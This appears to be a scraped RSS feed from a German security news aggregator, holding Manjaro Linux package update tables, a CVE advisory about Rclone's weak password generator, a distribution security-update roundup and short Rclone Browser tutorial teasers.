     nextcloud-client-cloudproviders                    -              3.0.3-2
                       opencascade74                    -              7.4.0-1
                              openxr                    -             1.0.12-1
                    perl-carp-always                    -               0.16-1
                 perl-gtk3-imageview                    -                  6-1
                    perl-pdf-builder                    -              3.019-1
                    python-pdftotext                    -              2.1.5-1
                    python-re-assert                    -              1.1.0-1
                    python-sphobjinv                    -              2.0.1-1
                       stellarsolver                    -                1.5-1


:: Different overlay package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-11-17           2020-11-22
-------------------------------------------------------------------------------
                           amd-ucode20201113.r1774.2ea8667-120201120.r1785.bc9cd0b-1
                      linux-firmware20201113.r1774.2ea8667-120201120.r1785.bc9cd0b-1
                            linux414           4.14.206-1           4.14.207-1
                    linux414-headers           4.14.206-1           4.14.207-1
                            linux419           4.19.157-1           4.19.158-1
                    linux419-headers           4.19.157-1           4.19.158-1
                             linux44            4.4.243-1            4.4.244-1
                     linux44-headers            4.4.243-1            4.4.244-1
                             linux49            4.9.243-1            4.9.244-1
                     linux49-headers            4.9.243-1            4.9.244-1
                             linux54             5.4.77-1             5.4.78-1
                     linux54-headers             5.4.77-1             5.4.78-1
                             linux59              5.9.8-2              5.9.9-1
                     linux59-headers              5.9.8-2              5.9.9-1


:: Different sync package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-11-17           2020-11-22
-------------------------------------------------------------------------------
                           amd-ucode   20201023.dae4b4c-1   20201113.2ea8667-1
                               gpgme             1.14.0-1             1.15.0-1
                      linux-firmware   20201023.dae4b4c-1   20201113.2ea8667-1
                        python-gpgme             1.14.0-1             1.15.0-1
                              qgpgme             1.14.0-1             1.15.0-1
                          util-linux               2.36-4             2.36.1-3
                     util-linux-libs               2.36-4             2.36.1-3


:: Different overlay package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-11-17           2020-11-22
-------------------------------------------------------------------------------
            archlinux-appstream-data         20200720-1.1                    -
                gnome-control-center           3.38.1-1.1             3.38.2-1
              grub-theme-live-common               20.2-9              20.2-10
             grub-theme-live-manjaro               20.2-9              20.2-10
                  grub-theme-manjaro               20.2-9              20.2-10
                  linux414-acpi_call            1.1.0-178            1.1.0-179
                   linux414-bbswitch              0.8-178              0.8-179
                linux414-broadcom-wl     6.30.223.271-178     6.30.223.271-179
                linux414-ndiswrapper              1.63-28              1.63-29
               linux414-nvidia-340xx           340.108-48           340.108-49
               linux414-nvidia-390xx           390.132-56           390.132-57
               linux414-nvidia-418xx           418.113-53           418.113-54
               linux414-nvidia-430xx            430.64-54            430.64-55
               linux414-nvidia-435xx            435.21-64            435.21-65
               linux414-nvidia-440xx           440.100-22           440.100-23
               linux414-nvidia-450xx          450.80.02-6          450.80.02-7
               linux414-nvidia-455xx          455.45.01-1          455.45.01-2
                   linux414-nvidiabl             0.88-178             0.88-179
                      linux414-r8168          8.048.03-25          8.048.03-26
                  linux414-rt3562sta       2.4.1.1_r4-174       2.4.1.1_r4-175
                   linux414-tp_smapi              0.43-70              0.43-71
                linux414-vhba-module          20200106-41          20200106-42
    linux414-virtualbox-host-modules             6.1.16-4             6.1.16-5
                        linux414-zfs              0.8.5-6              0.8.5-7
                  linux419-acpi_call            1.1.0-148            1.1.0-149
                   linux419-bbswitch              0.8-148              0.8-149
                linux419-broadcom-wl     6.30.223.271-147     6.30.223.271-148
                linux419-ndiswrapper              1.63-38              1.63-39
               linux419-nvidia-340xx           340.108-68           340.108-69
               linux419-nvidia-390xx           390.132-77           390.132-78
               linux419-nvidia-418xx           418.113-76           418.113-77
               linux419-nvidia-430xx            430.64-76            430.64-77
               linux419-nvidia-435xx            435.21-87            435.21-88
               linux419-nvidia-440xx           440.100-29           440.100-30
               linux419-nvidia-450xx          450.80.02-7          450.80.02-8
               linux419-nvidia-455xx          455.45.01-1          455.45.01-2
                   linux419-nvidiabl             0.88-147             0.88-148
                      linux419-r8168          8.048.03-34          8.048.03-35
                  linux419-rtl8723bu          20200904-13          20200904-14
                   linux419-tp_smapi              0.43-97              0.43-98
                linux419-vhba-module          20200106-62          20200106-63
   linux419-virtualbox-guest-modules             6.1.16-5             6.1.16-6
    linux419-virtualbox-host-modules             6.1.16-5             6.1.16-6
                        linux419-zfs              0.8.5-7              0.8.5-8
                   linux44-acpi_call            1.1.0-174            1.1.0-175
                    linux44-bbswitch              0.8-174              0.8-175
                 linux44-broadcom-wl     6.30.223.271-144     6.30.223.271-145
                 linux44-ndiswrapper              1.63-22              1.63-23
                linux44-nvidia-340xx           340.108-39           340.108-40
                linux44-nvidia-390xx           390.132-45           390.132-46
                linux44-nvidia-418xx           418.113-44           418.113-45
                linux44-nvidia-430xx            430.64-43            430.64-44
                linux44-nvidia-435xx            435.21-45            435.21-46
                linux44-nvidia-440xx           440.100-17           440.100-18
                linux44-nvidia-450xx          450.80.02-5          450.80.02-6
                linux44-nvidia-455xx          455.45.01-1          455.45.01-2
                    linux44-nvidiabl             0.88-174             0.88-175
                       linux44-r8168          8.048.03-19          8.048.03-20
                   linux44-rt3562sta       2.4.1.1_r4-131       2.4.1.1_r4-132
                    linux44-tp_smapi              0.43-53              0.43-54
                 linux44-vhba-module          20200106-35          20200106-36
     linux44-virtualbox-host-modules             6.1.16-3             6.1.16-4
                         linux44-zfs              0.8.5-5              0.8.5-6
                   linux49-acpi_call            1.1.0-188            1.1.0-189
                    linux49-bbswitch              0.8-188              0.8-189
                 linux49-broadcom-wl     6.30.223.271-188     6.30.223.271-189
                 linux49-ndiswrapper              1.63-22              1.63-23
                linux49-nvidia-340xx           340.108-39           340.108-40
                linux49-nvidia-390xx           390.132-46           390.132-47
                linux49-nvidia-418xx           418.113-45           418.113-46
                linux49-nvidia-430xx            430.64-44            430.64-45
                linux49-nvidia-435xx            435.21-51            435.21-52
                linux49-nvidia-440xx           440.100-17           440.100-18
                linux49-nvidia-450xx          450.80.02-5          450.80.02-6
                linux49-nvidia-455xx          455.45.01-1          455.45.01-2
                    linux49-nvidiabl             0.88-188             0.88-189
                       linux49-r8168          8.048.03-19          8.048.03-20
                   linux49-rt3562sta       2.4.1.1_r4-172       2.4.1.1_r4-173
                    linux49-tp_smapi              0.43-56              0.43-57
                 linux49-vhba-module          20200106-35          20200106-36
     linux49-virtualbox-host-modules             6.1.16-3             6.1.16-4
                         linux49-zfs              0.8.5-5              0.8.5-6
                   linux54-acpi_call             1.1.0-85             1.1.0-86
                    linux54-bbswitch               0.8-85               0.8-86
                 linux54-broadcom-wl      6.30.223.271-85      6.30.223.271-86
                 linux54-ndiswrapper              1.63-41              1.63-42
                linux54-nvidia-340xx           340.108-77           340.108-78
                linux54-nvidia-390xx           390.132-85           390.132-86
                linux54-nvidia-418xx           418.113-85           418.113-86
                linux54-nvidia-430xx            430.64-85            430.64-86
                linux54-nvidia-435xx            435.21-85            435.21-86
                linux54-nvidia-440xx           440.100-31           440.100-32
                linux54-nvidia-450xx          450.80.02-7          450.80.02-8
                linux54-nvidia-455xx          455.45.01-1          455.45.01-2
                    linux54-nvidiabl              0.88-85              0.88-86
                       linux54-r8168          8.048.03-37          8.048.03-38
                   linux54-rtl8723bu          20200904-15          20200904-16
                    linux54-tp_smapi              0.43-85              0.43-86
                 linux54-vhba-module          20200106-70          20200106-71
    linux54-virtualbox-guest-modules             6.1.16-5             6.1.16-6
     linux54-virtualbox-host-modules             6.1.16-5             6.1.16-6
                         linux54-zfs              0.8.5-7              0.8.5-8
                   linux59-acpi_call              1.1.0-7              1.1.0-8
                    linux59-bbswitch                0.8-7                0.8-8
                 linux59-broadcom-wl       6.30.223.271-7       6.30.223.271-8
                linux59-nvidia-390xx            390.132-1            390.132-4
                linux59-nvidia-450xx          450.80.02-7          450.80.02-8
                linux59-nvidia-455xx          455.45.01-1          455.45.01-2
                       linux59-r8168           8.048.03-7           8.048.03-8
                   linux59-rtl8723bu           20200904-7           20200904-8
                    linux59-tp_smapi               0.43-7               0.43-8
                 linux59-vhba-module           20200106-7           20200106-8
    linux59-virtualbox-guest-modules             6.1.16-6             6.1.16-7
     linux59-virtualbox-host-modules             6.1.16-6             6.1.16-7
                         linux59-zfs              0.8.5-7              0.8.5-8
                 manjaro-chrootbuild      r160.g0c1e061-1      r161.g750d948-1
              manjaro-tools-base-git      r2925.15406d8-1      r2939.0f896a2-1
               manjaro-tools-iso-git      r2925.15406d8-1      r2939.0f896a2-1
               manjaro-tools-pkg-git      r2925.15406d8-1      r2939.0f896a2-1
              manjaro-tools-yaml-git      r2925.15406d8-1      r2939.0f896a2-1
                        pamac-common             9.5.12-1             9.5.12-2
                            qt5-base             5.15.1-3             5.15.2-1
             qt5-xcb-private-headers             5.15.1-3             5.15.2-1
                               snapd             2.47.1-1               2.48-1
                         thunderbird           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-ar           78.4.3-0.1           78.5.0-0.1
                thunderbird-i18n-ast           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-be           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-bg           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-br           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-ca           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-cs           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-cy           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-da           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-de           78.4.3-0.1           78.5.0-0.1
                thunderbird-i18n-dsb           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-el           78.4.3-0.1           78.5.0-0.1
              thunderbird-i18n-en-gb           78.4.3-0.1           78.5.0-0.1
              thunderbird-i18n-en-us           78.4.3-0.1           78.5.0-0.1
              thunderbird-i18n-es-ar           78.4.3-0.1           78.5.0-0.1
              thunderbird-i18n-es-es           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-et           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-eu           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-fi           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-fr           78.4.3-0.1           78.5.0-0.1
              thunderbird-i18n-fy-nl           78.4.3-0.1           78.5.0-0.1
              thunderbird-i18n-ga-ie           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-gd           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-gl           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-he           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-hr           78.4.3-0.1           78.5.0-0.1
                thunderbird-i18n-hsb           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-hu           78.4.3-0.1           78.5.0-0.1
              thunderbird-i18n-hy-am           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-id           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-is           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-it           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-ja           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-ko           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-lt           78.4.3-0.1           78.5.0-0.1
              thunderbird-i18n-nb-no           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-nl           78.4.3-0.1           78.5.0-0.1
              thunderbird-i18n-nn-no           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-pl           78.4.3-0.1           78.5.0-0.1
              thunderbird-i18n-pt-br           78.4.3-0.1           78.5.0-0.1
              thunderbird-i18n-pt-pt           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-rm           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-ro           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-ru           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-si           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-sk           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-sl           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-sq           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-sr           78.4.3-0.1           78.5.0-0.1
              thunderbird-i18n-sv-se           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-tr           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-uk           78.4.3-0.1           78.5.0-0.1
                 thunderbird-i18n-vi           78.4.3-0.1           78.5.0-0.1
              thunderbird-i18n-zh-cn           78.4.3-0.1           78.5.0-0.1
              thunderbird-i18n-zh-tw           78.4.3-0.1           78.5.0-0.1
                         xorg-server             1.20.9-31.20.9.r21.g5c400cae1-1
                  xorg-server-common             1.20.9-31.20.9.r21.g5c400cae1-1
                   xorg-server-devel             1.20.9-31.20.9.r21.g5c400cae1-1
                  xorg-server-xephyr             1.20.9-31.20.9.r21.g5c400cae1-1
                   xorg-server-xnest             1.20.9-31.20.9.r21.g5c400cae1-1
                    xorg-server-xvfb             1.20.9-31.20.9.r21.g5c400cae1-1
                xorg-server-xwayland             1.20.9-31.20.9.r21.g5c400cae1-1


:: Different sync package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-11-17           2020-11-22
-------------------------------------------------------------------------------
                             akonadi            20.08.3-1            20.08.3-2
                  alsa-card-profiles            13.99.3-113.99.3+4+gd83ad6990-1
                              amdvlk          2020.Q4.4-1          2020.Q4.5-1
                              c-ares             1.16.1-2             1.17.1-1
                               cmake             3.18.4-1             3.19.0-1
                                cups              2.3.3-32.3.3+106+ga72b0140e-1
                        cups-filters             1.28.5-1             1.28.5-3
                             devhelp             3.38.0-1             3.38.1-1
                                 eog             3.38.0-1             3.38.1-1
                           evolution             3.38.1-1             3.38.2-1
                evolution-bogofilter             3.38.1-1             3.38.2-1
               evolution-data-server             3.38.1-1             3.38.2-1
                       evolution-ews             3.38.1-1             3.38.2-1
              evolution-spamassassin             3.38.1-1             3.38.2-1
                              falkon             3.1.0-12             3.1.0-14
                             freetds             1.2.11-1             1.2.12-1
                              glibmm             2.64.2-1             2.64.4-1
                         glibmm-docs             2.64.2-1             2.64.4-1
                    gnome-calculator             3.38.1-1             3.38.2-1
                    gnome-devel-docs             3.38.1-1             3.38.2-1
          gnome-getting-started-docs             3.36.2-1             3.38.0-1
                          gnome-maps           3.38.1.1-1             3.38.2-1
                     gnome-user-docs             3.38.1-1             3.38.2-1
                         imagemagick          7.0.10.38-1          7.0.10.41-1
                     imagemagick-doc          7.0.10.38-1          7.0.10.41-1
                         intel-ucode           20201112-1           20201118-1
                               krita              4.4.1-3              4.4.1-5
                             kseexpr            4.0.0.0-1            4.0.1.0-1
                                kwin             5.20.3-1             5.20.3-2
                     lib32-rust-libs           1:1.47.0-4           1:1.48.0-1
                          libakonadi            20.08.3-1            20.08.3-2
                              libbpf              0.1.1-1                0.2-1
                             libcups              2.3.3-32.3.3+106+ga72b0140e-1
                       libjpeg-turbo              2.0.5-3              2.0.6-1
                          libmagick6          6.9.11.38-1          6.9.11.39-1
               libnautilus-extension             3.38.1-1             3.38.2-1
]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2020-28924]]></title>
<description><![CDATA[An issue was discovered in Rclone before 1.53.3. Due to the use of a weak random number generator, the password generator has been producing weak passwords with much less entropy than advertised. The suggested passwords depend deterministically on the time the second rclone was started. This limi...]]></description>
<link>https://tsecurity.de/de/1302609/sicherheitsluecken/cve-2020-28924/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1302609/sicherheitsluecken/cve-2020-28924/</guid>
<pubDate>Thu, 19 Nov 2020 23:03:11 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An issue was discovered in Rclone before 1.53.3. Due to the use of a weak random number generator, the password generator has been producing weak passwords with much less entropy than advertised. The suggested passwords depend deterministically on the time the second rclone was started. This limits the entropy of the passwords enormously. These passwords are often used in the crypt backend for encryption of data. It would be possible to make a dictionary of all possible passwords with about 38 million entries per password length. This would make decryption of secret material possible with a plausible amount of effort. NOTE: all passwords generated by affected versions should be changed.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by Arch Linux (chromium and firefox), CentOS (bind, curl, fence-agents, kernel, librepo, libvirt, microcode_ctl, python, python3, qt and qt5-qtbase, resource-agents, and tomcat), Debian (drupal7, firefox-esr, jupyter-notebook, packer, python3.5, and rclone), Fedo...]]></description>
<link>https://tsecurity.de/de/1302110/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1302110/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 19 Nov 2020 15:30:11 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Arch Linux</b> (chromium and firefox), <b>CentOS</b> (bind, curl, fence-agents, kernel, librepo, libvirt, microcode_ctl, python, python3, qt and qt5-qtbase, resource-agents, and tomcat), <b>Debian</b> (drupal7, firefox-esr, jupyter-notebook, packer, python3.5, and rclone), <b>Fedora</b> (firefox), <b>Mageia</b> (firefox, nss), <b>openSUSE</b> (gdm, kernel-firmware, and moinmoin-wiki), <b>Oracle</b> (net-snmp), <b>SUSE</b> (libzypp, zypper), and <b>Ubuntu</b> (c-ares).]]></content:encoded>
</item>
<item>
<title><![CDATA[How to set up Rclone Browser on Linux]]></title>
<description><![CDATA[Rclone is a command-line utility that allows Linux users to quickly and easily connect to any cloud storage service (using Dropbox, Google Drive, Open Drive, and many more). The trouble is, Rclone is complicated and tedious to use for the average user. If you need to use Rclone to connect to your...]]></description>
<link>https://tsecurity.de/de/1282657/linux-tipps/how-to-set-up-rclone-browser-on-linux/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1282657/linux-tipps/how-to-set-up-rclone-browser-on-linux/</guid>
<pubDate>Sat, 31 Oct 2020 17:15:15 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Rclone is a command-line utility that allows Linux users to quickly and easily connect to any cloud storage service (using Dropbox, Google Drive, Open Drive, and many more). The trouble is, Rclone is complicated and tedious to use for the average user. If you need to use Rclone to connect to your favorite cloud storage […]</p>
<p>The post <a rel="nofollow" href="https://www.addictivetips.com/ubuntu-linux-tips/rclone-browser-linux/">How to set up Rclone Browser on Linux</a> appeared first on <a rel="nofollow" href="https://www.addictivetips.com/">AddictiveTips</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to set up Rclone Browser on Linux]]></title>
<description><![CDATA[Rclone is a command-line utility that allows Linux users to quickly and easily connect to any cloud storage service (using Dropbox, Google Drive, Open Drive, and many more). The trouble is, Rclone is complicated and tedious to use for the average user. If you need to use Rclone to connect to your...]]></description>
<link>https://tsecurity.de/de/1282656/betriebssysteme/how-to-set-up-rclone-browser-on-linux/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1282656/betriebssysteme/how-to-set-up-rclone-browser-on-linux/</guid>
<pubDate>Sat, 31 Oct 2020 17:15:08 +0100</pubDate>
<category>🖥️  Betriebssysteme</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Rclone is a command-line utility that allows Linux users to quickly and easily connect to any cloud storage service (using Dropbox, Google Drive, Open Drive, and many more). The trouble is, Rclone is complicated and tedious to use for the average user. If you need to use Rclone to connect to your favorite cloud storage […]</p>
<p>The post <a rel="nofollow" href="https://www.addictivetips.com/ubuntu-linux-tips/rclone-browser-linux/">How to set up Rclone Browser on Linux</a> appeared first on <a rel="nofollow" href="https://www.addictivetips.com/">AddictiveTips</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[ARM Stable Update] 2020-08-13 - Bitwarden, Plasma, SystemD and Kernels]]></title>
<description><![CDATA[Hello ARM community.
Another Stable update is upon us! This is a huge one!


Some highlights:

Most of our kernels got updated
The Raspberry Pi default kernel now updated to 5.4. Users that have installed the “next” kernel needs to switch to linux-rpi4 as linux-rpi4-next has been removed from the...]]></description>
<link>https://tsecurity.de/de/1210177/unix-server/arm-stable-update-2020-08-13-bitwarden-plasma-systemd-and-kernels/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1210177/unix-server/arm-stable-update-2020-08-13-bitwarden-plasma-systemd-and-kernels/</guid>
<pubDate>Sat, 15 Aug 2020 14:48:33 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello ARM community.</p>
<p>Another Stable update is upon us! This is a huge one!</p>
<p><img src="https://forum.manjaro.org/uploads/default/original/1X/1468420c9b125389128ed6799fdb40f395b763ee.jpeg" alt="radxa_rockpi4c" data-base62-sha1="2UwV6UPOhnZzKMuo0cDr3wgZkdw" width="560" height="444"></p>
<hr>
<h2>Some highlights:</h2>
<ul>
<li>Most of our <strong>kernels</strong> got updated</li>
<li>The <strong>Raspberry Pi default kernel</strong> now updated to 5.4. Users that have installed the “next” kernel needs to switch to <code>linux-rpi4</code> as <code>linux-rpi4-next</code> has been removed from the repository.</li>
<li>Added <strong>Bitwarden</strong> to the repo</li>
<li>Our <code>linux-aarch64</code> got renamed to <code>linux</code> while it got updated to 5.8. Please select yes when it asks if you want to replace your current kernel with <code>linux</code>.</li>
<li>The <code>uboot-rockpi4</code> also got renamed to <code>uboot-rockpi4b</code>, so users of the Rock Pi 4B should replace the old uboot package with this one.</li>
<li>
<strong>Plasma</strong> updated to 5.19.4</li>
<li>Also updated <strong>SystemD</strong> to 246.1</li>
<li>
<strong>Thunderbird</strong> updated to 68.11.0</li>
<li>
<strong>Wayfire</strong> updated to 0.5.0</li>
<li>9.5.7 of <strong>Pamac</strong> is also included in this one</li>
<li>The usual updates to <strong>Python</strong> packages</li>
</ul>
<hr>
<h2>Upstream Notifications:</h2>
<details>
<summary>
Older notifications</summary>
<p>The <code>nss</code> and <code>zn_poly</code> packages requires manual intervention:<br>
<a href="https://www.archlinux.org/news/nss3511-1-and-lib32-nss3511-1-updates-require-manual-intervention/" class="inline-onebox">Arch Linux - News: nss&gt;=3.51.1-1 and lib32-nss&gt;=3.51.1-1 updates require manual intervention</a><br>
<a href="https://www.archlinux.org/news/zn_poly-092-2-update-requires-manual-intervention/" class="inline-onebox">Arch Linux - News: zn_poly 0.9.2-2 update requires manual intervention</a></p>
<p>The packages <code>hplip</code> and <code>firewalld</code> requires manual intervention:<br>
<a href="https://www.archlinux.org/news/hplip-3203-2-update-requires-manual-intervention/" class="inline-onebox">Arch Linux - News: hplip 3.20.3-2 update requires manual intervention</a><br>
<a href="https://www.archlinux.org/news/firewalld081-2-update-requires-manual-intervention/" class="inline-onebox">Arch Linux - News: firewalld&gt;=0.8.1-2 update requires manual intervention</a></p>
</details>
<hr>
<h2>Package changes:</h2>
<p>(Thu Aug 13 12:37:11 CEST 2020)</p>
<ul>
<li>arm-stable community aarch64:  748 new and 577 removed package(s)</li>
<li>arm-stable core aarch64:  29 new and 27 removed package(s)</li>
<li>arm-stable extra aarch64:  373 new and 374 removed package(s)</li>
</ul>
<pre><code class="lang-auto">:: Different overlay package(s) in repository community aarch64

-------------------------------------------------------------------------------
                             PACKAGE           2020-07-28          2020-08-13
-------------------------------------------------------------------------------
                     ap6256-firmware            2020.02-2            2020.02-4
      ayatana-indicator-datetime-git          git_r2192-1          git_r2210-1
       ayatana-indicator-display-git       r233.ac2f7de-1       r238.fdda527-1
         ayatana-indicator-power-git          git_r1043-1          git_r1057-1
       ayatana-indicator-session-git          git_r2440-1          git_r2448-1
         ayatana-indicator-sound-git          git_r2735-1          git_r2741-1
                               calls  0.1.7+11+gb95de5c-1  0.1.7+12+g6fe3639-4
                              chatty             0.1.13-1             0.1.14-1
                      deviceinfo-git        r33.544833a-2        r34.06e02d4-1
                            electron              9.1.1-1              9.2.0-1
                     element-desktop              1.7.1-1              1.7.3-1
                         element-web              1.7.1-1              1.7.3-1
                           feedbackd  0.0.0+git20200707-2  0.0.0+git20200726-1
                        gnome-camera  0.0.0+git20200715-1  0.0.0+git20200715-2
            libayatana-indicator-git          git_r1878-1          git_r1894-1
                           libhandy1             0.83.0-1             0.84.0-1
                maliit-framework-git     r1867.99e41962-2     r1873.223331b3-1
                 maliit-keyboard-git     r2034.99cd3f43-1     r2034.99cd3f43-2
             manjaro-arm-i3-settings           20200410-1           20200804-1
                                phoc              0.4.1-2              0.4.2-2
                               phosh   0.4.1+9+g835f4bb-1              0.4.3-4
            pinephone-manjaro-tweaks           20200725-1           20200811-1
             pinephone-modem-scripts               0.10-1               0.12-1
              pinephone-post-install           20200711-1           20200806-1
                    plasma-mobile-nm             5.19.3-1             5.19.4-1
                         plasma-nano             5.19.3-1             5.19.4-1
             plasma-phone-components             5.19.3-1             5.19.4-1
                       purple-mm-sms              0.1.6-1              0.1.7-1
                rockpi4-post-install           20200305-1           20200807-1
              rockpro64-post-install           20200305-1           20200807-1
                  rtl8723bt-firmware   20190223.28ad358-1   20200705.8840b10-1
                               snapd             2.45.2-1           2.45.3.1-1
                         squeekboard  1.9.2+30+g88821e2-1              1.9.3-2
                             wayfire              0.4.0-1              0.5.0-1
                         wayfire-git      r1341.5f32ef6-10.4.0.r244.g9e971208-1
                                 wcm              0.4.0-1              0.5.0-1
                             wcm-gitv0.3.1.r29.g2a0a70f-1v0.4.0.r14.g1595d35-1
                           wf-config              0.4.0-1              0.5.0-1
                       wf-config-git       r124.94c7ecb-2  0.4.0.r6.ge3b78da-1
                            wf-shell              0.4.0-1              0.5.0-1
                        wf-shell-git       r134.923104d-2 0.4.0.r10.g12435d0-1
                wf-sound-control-git        r14.5770403-1                    -
                        wire-desktop          3.18.2925-3          3.19.2928-1
                          attica-git                    -5.74.0.r760.gf82c7f0-1
                           baloo-git                    -5.74.0.r2811.g4aa6306c-1
                           bitwarden                    -             1.20.1-1
                       bluedevil-git                    -5.19.80.r2131.g175e92b7-2
                        bluez-qt-git                    -5.74.0.r602.g792d6c0-1
                          breeze-git                    -5.19.80.r2020.ga75c986f-1
                     breeze-grub-git                    -5.15.80.r8.g2c1d5e7-2
                      breeze-gtk-git                    -5.19.80.r390.g2158b47-1
                    breeze-icons-git                    -5.74.0.r1616.g1b83272f-1
                        discover-git                    -5.19.80.r7787.gde8452b7-1
                         drkonqi-git                    -5.19.80.r533.g12d1ff57-1
             extra-cmake-modules-git                    -5.74.0.r3177.g17d053b-1
            frameworkintegration-git                    -5.74.0.r530.g3825bf9-1
                     kactivities-git                    -5.74.0.r1298.g6123b94f-1
               kactivities-stats-git                    -5.74.0.r295.gb6fdfb0-1
               kactivitymanagerd-git                    -5.15.80.r1294.gb5a7049-2
                         kapidox-git                    -5.74.0.r483.g3af0ca6-1
                        karchive-git                    -5.74.0.r431.g7403af3-1
                           kauth-git                    -5.74.0.r370.g80d8458-1
                      kbookmarks-git                    -5.74.0.r348.g0d380a8-1
                        kcmutils-git                    -5.74.0.r418.gdd5babd-1
                         kcodecs-git                    -5.74.0.r319.gd251ab4-1
                     kcompletion-git                    -5.74.0.r376.g86566cc-1
                         kconfig-git                    -5.74.0.r713.g45d8532-1
                  kconfigwidgets-git                    -5.74.0.r488.g8c452bf-1
                     kcoreaddons-git                    -5.74.0.r1013.gd918586-1
                          kcrash-git                    -5.74.0.r325.g310af9a-1
                     kdbusaddons-git                    -5.74.0.r317.gac665a3-1
                   kde-cli-tools-git                    -5.19.80.r1772.g8f58c57-2
                  kde-gtk-config-git                    -5.19.80.r847.gc16c9c1-2
                    kdeclarative-git                    -5.74.0.r795.gcb59f2a-1
                     kdecoration-git                    -5.19.80.r232.g0539093-2
                            kded-git                    -5.74.0.r330.g07999d9-1
                 kdelibs4support-git                    -5.74.0.r949.g6726e5a8-1
                kdeplasma-addons-git                    -5.19.80.r8371.g17b30f399-1
                 kdesignerplugin-git                    -5.74.0.r288.gd872bde-1
                           kdesu-git                    -5.74.0.r407.g942eb3b-1
                       kdewebkit-git                    -5.74.0.r236.g78e68a7-1
                          kdnssd-git                    -5.74.0.r264.g994e1de-1
                       kdoctools-git                    -5.74.0.r550.gd299beb-1
                      kemoticons-git                    -5.74.0.r332.g0d40178-1
                   kfilemetadata-git                    -5.74.0.r710.g49ad124-1
                         kgamma5-git                    -5.19.80.r423.gf703f55-2
                    kglobalaccel-git                    -5.74.0.r377.g24ca904-1
                      kguiaddons-git                    -5.74.0.r297.g3ab31e6-1
                       kholidays-git                    -5.74.0.r876.g561bc4e-1
                        khotkeys-git                    -5.19.80.r2013.g40ae386-1
                           khtml-git                    -5.74.0.r506.g269254d-1
                           ki18n-git                    -5.74.0.r406.gb97a869-1
                     kiconthemes-git                    -5.74.0.r438.gec53d0e-1
                       kidletime-git                    -5.74.0.r258.ga2bf6d5-1
                   kimageformats-git                    -5.57.0.r280.g6e9df28-1
                     kinfocenter-git                    -5.19.80.r1717.gd0d385f-2
                           kinit-git                    -5.74.0.r355.g441c8fb-1
                             kio-git                    -5.74.0.r4130.g6c836875-1
                 kirigami-addons-git                    -        r19.a445f08-1
                       kirigami2-git                    -5.74.0.r2344.g2d2c5fa9-1
                     kitemmodels-git                    -5.74.0.r440.g490e83e-1
                      kitemviews-git                    -5.74.0.r278.gde59802-1
                     kjobwidgets-git                    -5.74.0.r309.g81e4da2-1
                             kjs-git                    -5.74.0.r292.g56731d8-1
                        kjsembed-git                    -5.74.0.r252.g26d2f70-1
                    kmediaplayer-git                    -5.74.0.r246.gf07c9de-1
                       kmenuedit-git                    -5.19.80.r929.g4289215-2
                      knetattach-git                    -5.19.80.r7802.gb2a8000bb-1
